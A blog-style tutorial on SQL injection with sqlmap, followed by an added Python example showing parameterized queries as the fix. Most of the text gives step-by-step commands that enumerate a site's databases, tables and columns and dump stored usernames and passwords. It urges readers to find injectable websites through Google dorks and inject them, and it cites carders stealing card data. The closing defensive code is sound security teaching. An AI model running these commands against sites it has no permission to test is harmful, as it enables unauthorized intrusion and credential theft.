The use of databases for data storage and management has increased greatly in the development of web apps over time. The database facilitates the interaction between users and services. Databases, or DBMS for short in the context of database management systems, offer various benefits, including data input and storage, retrieval of large amounts of information, and ease of compilation and grouping.
But along with the ease and features that databases provide, and their many uses in the world of information and technology, especially in website development, pen testers and hackers are constantly trying to find vulnerabilities in database security. This is confirmed by the report released by Positive Technologies researchers, an information security research center in Europe: in the second quarter of 2017, the top 10 web application attacks were dominated by cross-site scripting at 39% and SQL injection at 24%. Positive Technologies said the second quarter's report is not much different from the first quarter's.
What is SQL
SQL is Structured Query Language, a computer language for creating, operating on, and storing data in databases.
Why SQL
- Allows users to access data in the relational databases management system.
- Allows users to define the data in a database and manipulate that data.
- Allows users to create views, stored procedures, and functions in databases.
SQL injection using SQLMAP in Kali Linux
Before we carry out an injection attack, of course we should make sure that there is a database security hole in the server or target. To find database security holes, we can use several methods. Among them, Google dorks are the most used by hackers and penetration testers.
But today I will tell you only about SQL injection. You can find SQL-injectable websites with the help of a Google dork, then you can inject the website.
Step 1 : Install SQLMAP on Kali Linux
In Kali Linux it is pre-installed, but on other Linux operating systems you can install it manually with the following command.
Type the command below into your terminal to install SQLMAP
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
As I mentioned, SQLMAP is pre-installed in Kali Linux, so you can call it directly from the terminal by typing 'sqlmap'. Now let's inject.
Step 2 : SQL injection using SQLMAP
Once we have found at least one SQL-vulnerable website, we execute the attack using SQLMAP. I took one of them here as a sample. First we need to reveal the name of the database; inside the databases there are tables and columns, which contain the data.
Target URL : testphp.vulnweb.com/artists.php?artist=1
Step 3 : Enumerate Databases
Command
sqlmap -u "target url" --dbs
So the complete command would look like this (the URL is quoted so that the shell does not interpret the "?")
sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" --dbs
From the command above, the result should look like this
We got the database name "acuart".
Step 4 : Enumerate Tables
Command
sqlmap -u "target url" --tables -D "database name"
So the complete command would look like this
sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" --tables -D acuart
The result should look like this
Step 5 : Enumerate Columns
sqlmap -u "target url" --columns -D "database name" -T "table name"
So the complete command would look like this
sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" --columns -D acuart -T users
The result should look like this
The "users" table consists of 8 columns, and it actually holds account credentials. Let's dump that data.
Command
sqlmap -u "target url" --dump -D "database name" -T "table name" -C "column name"
So the complete command would look like this
sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" --dump -D acuart -T users -C uname,pass,address
Or you can dump all the data inside the table, using this command
sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" --dump -D acuart -T users
The result should look like this
We are not actually hacking into the target site, but at least we have learned a lot about SQL injection using SQLMAP in Kali Linux, and we dumped the credentials. This technique is mostly used by carders (hackers who look for credit card accounts on e-commerce sites), who target financial, banking, shop, or e-commerce sites that store their users' credit card information.
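The enumeration above works because the artist value reaches the database as part of the SQL text. The following added example (not from the original post) contrasts that with input validation plus a bound parameter, using Python's sqlite3; the in-memory artists table, its column names, the function names and the sample inputs are constructed assumptions.

```python
import re
import sqlite3

def make_db():
    # Constructed in-memory stand-in for the site's database (schema assumed).
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE artists (artist_id INTEGER PRIMARY KEY, aname TEXT);
        INSERT INTO artists VALUES (1, 'artist one'), (2, 'artist two'),
                                   (3, 'artist three');
    """)
    return db

def artist_vulnerable(db, artist):
    # The request parameter is pasted into the SQL text, so its content can
    # change the structure of the query. sqlmap detects exactly this condition.
    sql = "SELECT aname FROM artists WHERE artist_id = " + artist
    return [row[0] for row in db.execute(sql)]

def artist_hardened(db, artist):
    # 1. Reject anything that is not a short run of ASCII digits.
    if not re.fullmatch(r"[0-9]{1,9}", artist):
        return []
    # 2. Bind the value with a placeholder: the driver passes it as data,
    #    so it can never be parsed as SQL syntax.
    sql = "SELECT aname FROM artists WHERE artist_id = ?"
    return [row[0] for row in db.execute(sql, (int(artist),))]

if __name__ == "__main__":
    db = make_db()
    for value in ("1", "1 OR 1=1"):  # constructed inputs
        print(repr(value), artist_vulnerable(db, value), artist_hardened(db, value))
```

With the concatenated query the second input returns every row in the table; with the hardened query it returns nothing, which is why sqlmap finds no injection point once every query on the page is parameterized.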